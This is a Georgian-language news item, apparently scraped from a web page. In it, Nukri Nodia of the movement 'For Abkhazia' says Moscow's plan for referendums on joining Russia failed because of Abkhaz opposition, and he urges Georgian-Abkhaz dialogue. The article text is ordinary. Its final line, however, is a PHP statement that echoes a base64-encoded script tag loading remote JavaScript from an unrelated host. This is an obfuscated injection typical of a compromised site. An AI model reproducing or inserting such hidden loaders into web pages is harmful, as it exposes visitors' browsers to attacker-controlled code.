celsiusi
ავერსი საქკაბელი
მოძრაობა "აფხაზეთისთვის" ლიდერის ნუკრი ნოდიას განცხადებით, აფხაზეთის მიმართულებით რეფერენდუმის გეგმა ჩავარდა - რუსეთთან მიერთების საკითხს აფხაზები პრინციპულად ეწინააღმდეგებიან და ამით, ცალსახად ხაზს უსვამენ ერთიან პოზიციას აღნიშნულ საკითხთან დაკავშირებით და გამოხატავენ საერთო განწყობებს მთელი საზოგადოების სახელით, რაც  საყურადღებო ფაქტია. ამის შესახებ მან საინფორმაციო სააგენტო BUSINESS TIME-ს განუცხადა.
 
მისივე თქმით, ცხინვალსა და სოხუმში რეფერენდუმის ჩატარება, რუსეთის შემადგენლობაში შესვლის შესახებ, როგორც ჩანს, მოსკოვის გეგმის ნაწილი იყო,  მაგრამ, ამ გეგმის ჩაშლა აფხაზების მხრიდან გაწეულმა წინააღმდეგობამ განაპირობა.  
 
"იმ შემთხვევაში, თუ აფხაზები და ოსები რეფერენდუმის გზით გამოხატავდნენ არჩევანს რუსეთის შემადგენლობაში შესვლის შესახებ, დიდი ალბათობით, ორივე ოკუპირებული რეგიონის რუსეთის შემადგენლობაში შესვლის პროცედურები სწრაფი ტემპით  დაიწყებოდა და მოხდებოდა მათი სრული ანექსია.
 
ოკუპირებული სამხრეთ ოსეთის ე.წ პრეზიდენტის, ანატოლი ბიბილოვისთვის, ალბათ მესამე ცდა ყველაზე რეალური იქნებოდა, რომ არა აფხაზური საზოგადოების, პოლიტიკური ჯგუფების ერთიანი პოზიცია და ასეთი სიმტკიცით გადალახული რუსეთის ზეწოლა. მიმდინარე წლის 31 მარტს, პესკოვის (რედ.: რუსეთის პრეზიდენტის პრესმდივანი, დმიტრი პესკოვი) მიერ გაკეთებული განცხადებაც მინიშნებს იმაზე, რომ ამავე წლის 30 მარტს, ბიბილოვის მხრიდან გაჟღერებულ ინიციატივას – რუსეთის შემადგენლობაში შესვლის შესახებ რეფერენდუმში გამოხატული ნების საფუძველზე პერსპექტივა ნაკლებად აქვს. ამასთან, ეს არ არის აფხაზების მხრიდან გამოხატული მსგავსი ინიციატივით და პოზიციით გამყარებული.
 
აფხაზური საზოგადოების მხრიდან ეს გაბედულობა და წინააღმდეგობა ძალიან ბევრ რამეზე მეტყველებს. უკრაინაში მიმდინარე საომარი მოქმედებებისა და რუსეთის წინააღმდეგ ამოქმედებული სანქციების ფონზე, მოსკოვის პოლიტიკას ოკუპირებულ რეგიონებთან მიმართებაში სხვადასხვა წახნაგები ექნება.  ჩვენ უნდა დავინახოთ პერსპექტივები ქართულ-აფხაზური ურთიერთობების ნორმალიზებისა და მჭიდრო თანამშროლობისთვის.  დავაგვიანეთ, მაგრამ კონფლიქტის მშვიდობიან მოგვარებას და სამშვიდობო პროცესებს გამოცოცხლება სჭირდება!იმისათვის , რომ სამშვიდობო პოლიტიკა გავხადოთ ეფექტიანი, სასწრაფოდ უნდა გაჟღერდეს მკაფიო და კონკრეტული გზავნილები ოფიციალური თბილისიდან. ორივე მხარემ, მაქსიმალურად უნდა შეუწყოს ხელი საზოგადოებრივ ორგანიზაციებსა და ექსპერტებს, რათა შეიქმნას კონკრეტული ფორმატი ქართულ–აფხაზური, თემატური და შედეგზე ორიენტირებული დიალოგისთვის. ეს გამოწვევა, რაც დღეს უდგას საქართველოს უნდა ვაქციოთ  კონფლიქტის მშვიდობიანი ტრანსფორმაციისა და ქართულ - აფხაზური საზოგადოების შერიგების შესაძლებლობად," – განაცხადა ნუკრი ნოდიამ. 
 
1360
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");